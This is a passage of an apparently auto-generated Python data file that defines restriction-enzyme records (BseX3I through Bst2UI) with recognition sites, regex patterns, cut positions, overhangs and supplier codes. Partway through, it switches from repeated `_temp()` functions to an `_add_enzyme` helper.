'compsite': '(?=(?P<BseX3I>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BseX3I'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<BseXI>GCAGC))|(?=(?P<BseXI_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseXI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCCAGC'),
'compsite': '(?=(?P<BseYI>CCCAGC))|(?=(?P<BseYI_as>GCTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BseYI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'GTGCAG'),
'compsite': '(?=(?P<BsgI>GTGCAG))|(?=(?P<BsgI_as>CTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsgI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<Bsh1236I>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsh1236I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGRYCG'),
'compsite': '(?=(?P<Bsh1285I>CG[AG][CT]CG))',
'dna': None,
'freq': 1024.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'RY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRYCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsh1285I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BshFI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BshFI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<BshNI>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BshNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<BshTI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BshTI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BshVI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BshVI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGRYCG'),
'compsite': '(?=(?P<BsiEI>CG[AG][CT]CG))',
'dna': None,
'freq': 1024.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'RY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRYCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsiEI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<BsiHKAI>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsiHKAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<BsiHKCI>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['BsiHKCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CACGAG'),
'compsite': '(?=(?P<BsiI>CACGAG))|(?=(?P<BsiI_as>CTCGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'ACGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BsiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<BsiSI>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('C', 'Y'),
}
rest_dict['BsiSI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<BsiWI>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsiWI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<BsiYI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BsiYI'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGGAC'),
'compsite': '(?=(?P<BslFI>GGGAC))|(?=(?P<BslFI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BslFI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<BslI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BslI'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<BsmAI>GTCTC))|(?=(?P<BsmAI_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsmAI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'CGTCTC'),
'compsite': '(?=(?P<BsmBI>CGTCTC))|(?=(?P<BsmBI_as>GAGACG))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsmBI'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGGAC'),
'compsite': '(?=(?P<BsmFI>GGGAC))|(?=(?P<BsmFI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsmFI'] = _temp()
def _temp():
return {
'charac': (7, -1, None, None, 'GAATGC'),
'compsite': '(?=(?P<BsmI>GAATGC))|(?=(?P<BsmI_as>GCATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'M', 'N', 'S'),
}
rest_dict['BsmI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BsnI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BsnI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<Bso31I>GGTCTC))|(?=(?P<Bso31I_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bso31I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<BsoBI>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsoBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<Bsp119I>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp119I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGGCCC'),
'compsite': '(?=(?P<Bsp120I>GGGCCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp120I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GDGCHC'),
'compsite': '(?=(?P<Bsp1286I>G[AGT]GC[ACT]C))',
'dna': None,
'freq': 455.1111111111111,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'DGCH',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GDGCHC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'N'),
}
rest_dict['Bsp1286I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<Bsp13I>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bsp13I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGTACA'),
'compsite': '(?=(?P<Bsp1407I>TGTACA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGTACA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Bsp1407I'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<Bsp143I>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp143I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<Bsp1720I>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bsp1720I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCATGG'),
'compsite': '(?=(?P<Bsp19I>CCATGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCATGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bsp19I'] = _temp()
def _temp():
return {
'charac': (-8, -25, 24, 7, 'GACNNNNNNTGG'),
'compsite': '(?=(?P<Bsp24I>GAC......TGG))|(?=(?P<Bsp24I_as>CCA......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -25,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 24,
'site': 'GACNNNNNNTGG',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bsp24I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGCAT'),
'compsite': '(?=(?P<Bsp3004IV>CCGCAT))|(?=(?P<Bsp3004IV_as>ATGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bsp3004IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCGCAG'),
'compsite': '(?=(?P<Bsp460III>CGCGCAG))|(?=(?P<Bsp460III_as>CTGCGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Bsp460III'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCGCGA'),
'compsite': '(?=(?P<Bsp68I>TCGCGA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bsp68I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGC'),
'compsite': '(?=(?P<BspACI>CCGC))|(?=(?P<BspACI_as>GCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BspACI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<BspANI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['BspANI'] = _temp()
def _temp():
return {
'charac': (14, 7, None, None, 'CTCAG'),
'compsite': '(?=(?P<BspCNI>CTCAG))|(?=(?P<BspCNI_as>CTGAG))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspCNI'] = _temp()
def _temp():
return {
'charac': (9, 6, None, None, 'GAGTC'),
'compsite': '(?=(?P<BspD6I>GAGTC))|(?=(?P<BspD6I_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 6,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspD6I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BspDI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<BspEI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspEI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<BspFNI>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BspFNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTGGAC'),
'compsite': '(?=(?P<BspGI>CTGGAC))|(?=(?P<BspGI_as>GTCCAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCATGA'),
'compsite': '(?=(?P<BspHI>TCATGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCATGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspHI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<BspLI>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BspLI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACATGT'),
'compsite': '(?=(?P<BspLU11I>ACATGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACATGT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspLU11I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CTGCAG'),
'compsite': '(?=(?P<BspMAI>CTGCAG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['BspMAI'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<BspMI>ACCTGC))|(?=(?P<BspMI_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BspMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<BspMII>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspMII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCAGA'),
'compsite': '(?=(?P<BspNCI>CCAGA))|(?=(?P<BspNCI_as>TCTGG))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCAGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BspNCI'] = _temp()
def _add_enzyme(name, site, freq, fst5, fst3, ovhg, ovhgseq, compsite, suppl):
    """Register one restriction-enzyme record in ``rest_dict``.

    Factors out the fields that are constant for every record in this
    auto-generated section: ``dna``/``results``/``scd3``/``scd5`` are always
    ``None``, the substrate is always DNA, inactivation/optimal temperatures
    are 65/37 throughout, ``charac`` mirrors ``(fst5, fst3, scd5, scd3,
    site)``, and ``size`` always equals ``len(site)``.

    For enzymes whose cut positions are unknown, ``fst5``/``fst3``/``ovhg``/
    ``ovhgseq`` are all ``None``.
    """
    rest_dict[name] = {
        'charac': (fst5, fst3, None, None, site),
        'compsite': compsite,
        'dna': None,
        'freq': freq,
        'fst3': fst3,
        'fst5': fst5,
        'inact_temp': 65,
        'opt_temp': 37,
        'ovhg': ovhg,
        'ovhgseq': ovhgseq,
        'results': None,
        'scd3': None,
        'scd5': None,
        'site': site,
        'size': len(site),
        'substrat': 'DNA',
        'suppl': suppl,
    }


# Arguments: name, site, freq, fst5, fst3, ovhg, ovhgseq, compsite, suppl.
_add_enzyme('BspOI', 'GCTAGC', 4096.0, 5, -5, 4, 'CTAG',
            '(?=(?P<BspOI>GCTAGC))', ('B',))
_add_enzyme('BspPI', 'GGATC', 1024.0, 9, 5, -1, 'N',
            '(?=(?P<BspPI>GGATC))|(?=(?P<BspPI_as>GATCC))', ('B',))
_add_enzyme('BspQI', 'GCTCTTC', 16384.0, 8, 4, -3, 'NNN',
            '(?=(?P<BspQI>GCTCTTC))|(?=(?P<BspQI_as>GAAGAGC))', ('N',))
_add_enzyme('BspT104I', 'TTCGAA', 4096.0, 2, -2, -2, 'CG',
            '(?=(?P<BspT104I>TTCGAA))', ('K',))
_add_enzyme('BspT107I', 'GGYRCC', 1024.0, 1, -1, -4, 'GYRC',
            '(?=(?P<BspT107I>GG[CT][AG]CC))', ('K',))
_add_enzyme('BspTI', 'CTTAAG', 4096.0, 1, -1, -4, 'TTAA',
            '(?=(?P<BspTI>CTTAAG))', ('B',))
_add_enzyme('BspTNI', 'GGTCTC', 4096.0, 7, 5, -4, 'NNNN',
            '(?=(?P<BspTNI>GGTCTC))|(?=(?P<BspTNI_as>GAGACC))', ('X',))
_add_enzyme('BsrBI', 'CCGCTC', 4096.0, 3, -3, 0, '',
            '(?=(?P<BsrBI>CCGCTC))|(?=(?P<BsrBI_as>GAGCGG))', ('N',))
_add_enzyme('BsrDI', 'GCAATG', 4096.0, 8, 0, 2, 'NN',
            '(?=(?P<BsrDI>GCAATG))|(?=(?P<BsrDI_as>CATTGC))', ('N',))
_add_enzyme('BsrFI', 'RCCGGY', 1024.0, 1, -1, -4, 'CCGG',
            '(?=(?P<BsrFI>[AG]CCGG[CT]))', ('N',))
_add_enzyme('BsrGI', 'TGTACA', 4096.0, 1, -1, -4, 'GTAC',
            '(?=(?P<BsrGI>TGTACA))', ('N',))
_add_enzyme('BsrI', 'ACTGG', 1024.0, 6, -1, 2, 'GN',
            '(?=(?P<BsrI>ACTGG))|(?=(?P<BsrI_as>CCAGT))', ('N',))
_add_enzyme('BssAI', 'RCCGGY', 1024.0, 1, -1, -4, 'CCGG',
            '(?=(?P<BssAI>[AG]CCGG[CT]))', ('C',))
_add_enzyme('BssECI', 'CCNNGG', 256.0, 1, -1, -4, 'CNNG',
            '(?=(?P<BssECI>CC..GG))', ('I',))
_add_enzyme('BssHII', 'GCGCGC', 4096.0, 1, -1, -4, 'CGCG',
            '(?=(?P<BssHII>GCGCGC))', ('J', 'K', 'M', 'N', 'Q', 'R', 'X'))
_add_enzyme('BssMI', 'GATC', 256.0, 0, 0, -4, 'GATC',
            '(?=(?P<BssMI>GATC))', ('V',))
_add_enzyme('BssNAI', 'GTATAC', 4096.0, 3, -3, 0, '',
            '(?=(?P<BssNAI>GTATAC))', ('I', 'V'))
_add_enzyme('BssNI', 'GRCGYC', 1024.0, 2, -2, -2, 'CG',
            '(?=(?P<BssNI>G[AG]CG[CT]C))', ('V',))
_add_enzyme('BssSI', 'CACGAG', 4096.0, 1, -1, -4, 'ACGA',
            '(?=(?P<BssSI>CACGAG))|(?=(?P<BssSI_as>CTCGTG))', ('N',))
_add_enzyme('BssT1I', 'CCWWGG', 1024.0, 1, -1, -4, 'CWWG',
            '(?=(?P<BssT1I>CC[AT][AT]GG))', ('I', 'V'))
_add_enzyme('Bst1107I', 'GTATAC', 4096.0, 3, -3, 0, '',
            '(?=(?P<Bst1107I>GTATAC))', ('B', 'K'))
_add_enzyme('Bst2BI', 'CACGAG', 4096.0, 1, -1, -4, 'ACGA',
            '(?=(?P<Bst2BI>CACGAG))|(?=(?P<Bst2BI_as>CTCGTG))', ('I',))
_add_enzyme('Bst2UI', 'CCWGG', 512.0, 2, -2, -1, 'W',
